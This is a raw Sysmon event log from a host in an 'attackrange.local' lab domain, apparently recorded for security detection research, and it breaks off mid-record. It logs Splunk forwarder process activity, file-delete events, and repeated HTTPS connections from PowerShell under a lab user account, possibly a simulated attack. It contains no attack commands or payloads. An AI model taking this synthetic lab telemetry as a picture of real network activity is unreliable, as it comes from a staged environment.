21:59:10.798{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128605Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:10.798{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128604Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:10.798{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-83AE-613A-DF96-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128603Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:10.798{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-83AE-613A-DF96-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128602Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:10.784{B81B27B7-83AE-613A-DF96-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035128601Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:10.598{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3152D0D576A70BBCF4DC1DEE7FD79F1,SHA256=0FFE92ADF43C28FC16A1571991F96920E048AB722A56095E78D25BB82500F1CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128600Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:10.367{B81B27B7-83AE-613A-DE96-03000000C801}67405948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128599Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:10.214{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-83AE-613A-DE96-03000000C801}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128598Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:10.214{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128597Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:10.214{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128596Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:10.214{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128595Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:10.214{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128594Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:10.214{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-83AE-613A-DE96-03000000C801}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128593Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:10.214{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-83AE-613A-DE96-03000000C801}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035128592Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:10.199{B81B27B7-83AE-613A-DE96-03000000C801}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035128591Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:33.437{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62180-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035128590Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:33.114{00000000-0000-0000-0000-000000000000}6128<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local62179-false10.0.1.14WIN-DC-128389ldap 23542300x800000000000000035128611Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:11.599{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96A6441D5C6601ECE369A18AEDFF57AB,SHA256=DA938F518E0B3E8CAFA5ACFD9A865E93CDD113BFA62F98249421074FAD0D8217,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128610Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:11.214{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7BBABD3F1D691F338B4D5BC78E174499,SHA256=1A9B4E24F45504FF71E7D94D6FEFDE4A39DFAFD3AD6AD1E2F1FD1A975940DEC1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128613Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:12.613{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B9A60BD5B7B777109DA1ACD5AD13E34,SHA256=F1097F0A2411363517C8B6C436FA4011B9C5F176874345D897F6711E3F0A06D9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128612Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:12.297{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=73CADFB8AEF4D36F7B8740D0B25BFB9D,SHA256=D9BCFF57EF86312EC7A07C0C58877A29566D7CF6258FFCA80680C937B7CFF291,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128616Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:13.643{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=760E6AEA630E241AC75C8A7AAAA0FD89,SHA256=F67BE56AE83F65DF7ED2050DA08D4F6736CF553BDDB5EAEC968DB51E6F2B7A8C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128615Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:37.466{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62182-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035128614Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:37.365{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62181-false10.0.1.12-8000- 23542300x800000000000000035128617Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:14.660{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7FC32023352BC73719D1F6C75D0FCC9,SHA256=FF6C2E8B3E58C30C0E7ED9EA562EE4255FDD2A15CE44DB2932249F778A0BE9E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128618Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:15.679{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C77FC42B2E070391AFE7B31CE4A7EB13,SHA256=ECD085834ABFE2320E2B0D1118CA6C0C15A9BAB87AEA8443D23ED5593B3E1145,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128620Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:16.698{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5E6DAE2FADAB0FA710D0BD787DDE657,SHA256=30EF1099A5B4E9EC900A04D5CCB73E5641822CF6C2F9B813C66CA4A4F1C2E0FD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128619Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:16.327{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=01661C19707C0C1E340CE710756EC44E,SHA256=F6695A4FF4B7522E88EE4D4F480402B3ED126569F59A5E81E0390F34C5B073E6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128622Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:17.713{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C6398A8D3CFC0AB5EEAA3499CF06B14,SHA256=09E4E67BF4A83D3826BE384E9E9651EC4B46CCDD181BCCD71DF31737CB320254,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128621Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:41.478{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62183-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128623Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:18.729{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=037F29D70D9288E3AE65A0B74CF57360,SHA256=9B7D67D455859EC643E467660DC9516B833D404D8997CFF2BD437D365AFD60C1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128625Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:19.761{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C71EC2069BEDE7BFA2F6561A6A860F2,SHA256=2D0C48C4AD4C4DD95A4EBB5947E66B98B29CF5B2B9F93C23F8CFA3452B9E5331,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128624Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:43.246{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62184-false10.0.1.12-8000- 23542300x800000000000000035128626Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:20.780{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BFD3BB1FEBCD82D66F50BBC65588021,SHA256=BCA66416FBA9307AAC4E1E78A02D71EDE3969A03042DC7C7D2B25B79F87A9DE5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128628Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:21.794{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57EA749EF6FC008CF77BDCB6B4093596,SHA256=758C0A0E8A248A2D8020FBF82CA94E312A5553D23A6E36DFDBF2286F7E31C44B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128627Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:21.526{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9DD9D7BBCD1AD7EC29B80904572AD637,SHA256=42587BB74C8B2957D7E04B2D9EED2B427F6AF864CA87B09AB6974B1D7E944E5F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128630Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:22.810{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02B1C2C84F0C2BD642CF261367581AFF,SHA256=50736CAED21BABCDC8E9A3EDB3C8BD7F2BB9C1B1029DEEEAFF677EE6FD5D7F94,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128629Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:46.479{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62185-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128631Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:23.812{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F24C7F3F35AF6665CDBD208A8C8413FD,SHA256=75E37DFECA9DF793AA688F157AE78F3F8F38AE5B40085A760A5E2443DD34D3DA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128633Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:24.829{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EA25E2900DDB8DB1BD3C0A3A2BA1617,SHA256=D10768AD413C41B1392F753A23D6CC2D05C7D8884118B75B767A95CA85C136BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128632Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:48.292{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62186-false10.0.1.12-8000- 23542300x800000000000000035128634Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:25.843{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 